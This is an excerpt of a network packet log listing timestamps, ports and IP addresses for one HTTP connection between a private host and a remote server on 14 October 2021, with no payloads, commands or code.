Oct 14, 2021 08:40:55.823333979 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.823367119 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.823434114 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.823479891 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.823524952 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.823569059 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.823612928 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.823626995 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.823667049 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.823678970 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.823771000 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.823842049 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.823887110 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.823926926 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.823931932 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.823966980 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.823978901 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824028015 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824052095 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824063063 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824070930 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824143887 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824191093 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824229002 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824235916 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824239016 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824249029 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824284077 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824328899 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824373960 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824419022 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824449062 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824464083 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824511051 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824554920 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824599981 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824626923 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824645996 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824666023 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824676037 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824683905 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824692965 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824693918 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824738979 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824783087 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824803114 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824827909 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824841976 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824851990 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.824872971 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824918032 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824963093 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.824980974 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825006962 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825020075 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825031042 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825038910 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825047016 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825054884 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825100899 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825145006 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825158119 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825189114 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825196981 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825234890 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825279951 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825290918 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825300932 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825309992 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825318098 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825325966 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825371981 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825416088 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825460911 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825467110 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825505972 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825551987 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825596094 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825640917 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825644970 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825655937 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825664043 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825673103 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825681925 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825687885 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825690985 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825732946 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825778008 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825820923 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825823069 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825831890 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.825910091 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.825956106 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826000929 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826045036 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826050043 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826091051 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826091051 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826101065 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826137066 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826181889 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826226950 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826227903 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826267004 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826272011 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826277971 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826287031 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826294899 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826317072 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826363087 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826407909 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826409101 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826453924 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826499939 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826544046 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826574087 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826587915 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826611996 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826622963 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826637030 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826682091 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826725960 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826750994 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826771975 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826788902 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826798916 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826807976 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826816082 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826818943 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826864958 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826909065 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826927900 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.826955080 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.826967001 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.827059984 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.827235937 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.827244997 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.827254057 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.847760916 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.847821951 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.847978115 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.848016977 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.848052025 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848099947 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848145962 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848190069 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848233938 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848334074 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.848373890 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.848382950 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.848402023 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.848412037 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.848458052 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848504066 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848551035 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848596096 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848629951 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.848640919 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848805904 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.848928928 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848977089 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.848982096 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849021912 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849023104 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849033117 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849070072 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849109888 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849116087 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849284887 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849294901 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849303007 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849318027 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849366903 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849412918 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849457026 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849502087 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849638939 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849649906 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849657059 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849664927 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849673033 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849694014 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849742889 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849787951 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849833012 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849873066 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.849911928 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.849960089 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850004911 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850044966 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850049973 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850084066 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850094080 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850096941 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850142956 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850188017 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850220919 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850233078 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850260973 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850271940 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850281000 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850281000 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850290060 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850327969 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850372076 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850400925 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850416899 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850439072 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850464106 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850508928 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850553989 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850575924 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850599051 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850645065 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850691080 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850735903 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850761890 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850780964 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850800991 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850811005 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850820065 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850827932 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850828886 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850873947 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850879908 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850895882 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.850919962 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.850965977 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851011992 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851057053 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851058006 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851078033 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851104021 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851150990 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851197004 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851233006 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851243019 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851247072 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851255894 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851264954 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851289988 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851336002 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851381063 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851409912 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851423979 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851425886 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851473093 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851519108 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851563931 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851586103 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851599932 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851608038 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851608992 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851617098 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851655960 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851701021 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851747036 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851763964 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851778984 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851793051 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851840019 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851885080 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851931095 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.851941109 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851954937 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.851975918 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852022886 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852067947 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852113008 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852118015 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852132082 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852139950 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852149010 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852157116 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852159023 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852205992 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852256060 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852296114 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852302074 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852308989 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852318048 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852349043 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852396011 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852441072 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852472067 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852484941 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852487087 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852494001 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852503061 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852510929 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852533102 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852579117 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852623940 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852649927 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852663040 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852669954 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852672100 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852716923 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852762938 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852808952 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852826118 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852839947 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852848053 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.852854967 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852901936 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852947950 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.852993011 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.853002071 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853039026 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.853085995 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.853132010 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.853178024 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.853179932 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853193998 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853202105 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853209972 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853218079 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853224039 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.853226900 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853270054 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.853316069 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.853363991 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.853365898 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853379965 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853532076 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853544950 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853553057 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.853560925 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.874154091 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.874213934 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.874357939 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.874382973 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.874425888 CEST	80	49811	83.167.224.147	192.168.11.20
